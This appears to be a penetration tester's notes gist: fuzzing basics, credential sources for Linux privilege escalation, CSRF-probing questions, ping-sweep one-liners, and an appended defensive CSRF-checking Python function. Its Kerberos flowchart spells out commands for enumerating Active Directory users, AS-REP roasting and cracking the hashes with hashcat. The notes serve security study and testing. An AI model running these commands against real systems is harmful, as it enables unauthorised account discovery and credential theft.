what does this product do?
Fuzzing is the act of testing software for vulnerabilities by injecting mutated or iterated data.
This gist mostly lists tools for web app fuzzing, but a couple for binary file fuzzing too.
The general SOP (standard operating procedure) for app fuzzing seems to be: recon, enumeration, then fuzzing.
# 0xConda's Linux Privilege Escalation mindmap
## Credential Access
- reused passwords
- credentials from configuration files
- credentials from local db
source 😽
kerberos-hacking-v1

```mermaid
graph TD
1[export IP=target] --> |nmap -sV -sC -A -T4 -vv -oN nmap-$IP.txt $IP| A
A[is kerberos running? -- typically port 88] --> B
B[find Active Directory domain names] -->|enum4linux $IP| C
C[enumerate AD users] --> |kerbrute userenum --dc $AD-DOMAIN -d $IP /path/to/wordlist.txt| D
D[find ASREPRoastable names] --> |GetNPUsers.py $AD-DOMAIN/$AD-USER -request -no-pass -dc-ip $IP| E
E[crack hashes] --> |hashcat -m 18200 -a 0 $AD-USER.hash /path/to/wordlist.txt| F
F[find SMB shares with password] --> |smbclient -U $AD-DOMAIN/$AD-USER -L //$IP| G
```
```bash
# strip the last character of every line in place (e.g. a trailing CR from a Windows-edited file)
sed -i 's/.$//' file
# ping each host listed in file once (-I is the portable spelling of the deprecated -i)
xargs -I% ping -c 1 % < file
# resolve each domain to an IP by pulling the "(ip)" field out of ping's header line
cat DOMAINS.txt | xargs -I{} timeout 2 ping -q -c 2 {} | awk -F'[()]' '/PING/{print $2}' | tee IPs.txt
```
https://twitter.com/Rhynorater/status/1585640808568348674?s=20&t=Z5fB7J704bmtvT6kvV2c2w
- How is CSRF protection implemented? Does the application use only application/json content-type? Can you convert {"name":"Justin"} to name=Justin and change the content-type? Is the CSRF token tied to an account? A session? Are there any "unauthed" CSRF tokens? Can you switch POST -> GET? If not, what are you getting? If 405, then it is parsing the route, but GET is disallowed at this endpoint. Try other endpoints.
- Is caching implemented?
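The CSRF questions above each map to a server-side check. The following is an added example, not part of the gist, of a request guard that closes each of them: it refuses the POST -> GET switch, refuses the JSON-to-form re-encoding, and verifies a CSRF token that is bound to the caller's session (unauthenticated tokens cannot verify). The `Request` type, header names and route are constructed for the example.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

# Per-deployment server secret; generated fresh here for the example.
SECRET_KEY = secrets.token_bytes(32)

STATE_CHANGING_ROUTES = {"/api/rename"}  # constructed route for the example


@dataclass
class Request:
    """Minimal stand-in for a framework request object (constructed)."""
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: bytes = b""
    session_id: Optional[str] = None  # None == no authenticated session


def issue_csrf_token(session_id: str) -> str:
    """Token is an HMAC over the session id, so it is tied to that session only."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def check_csrf(req: Request) -> Tuple[bool, str]:
    """Return (allowed, reason). Only state-changing routes are guarded."""
    if req.path not in STATE_CHANGING_ROUTES:
        return True, "not state-changing"
    # 1. No method downgrade: a GET to a write endpoint is a 405, never a write.
    if req.method != "POST":
        return False, "405 method not allowed"
    # 2. Content-Type must be exactly application/json; x-www-form-urlencoded and
    #    text/plain (the types a cross-origin form can send) are rejected.
    ctype = req.headers.get("Content-Type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return False, "415 unsupported media type"
    # 3. Token must exist for this session; no session means no valid token.
    if not req.session_id:
        return False, "401 no session"
    presented = req.headers.get("X-CSRF-Token", "")
    expected = issue_csrf_token(req.session_id)
    if not hmac.compare_digest(presented, expected):
        return False, "403 csrf token not bound to this session"
    return True, "ok"
```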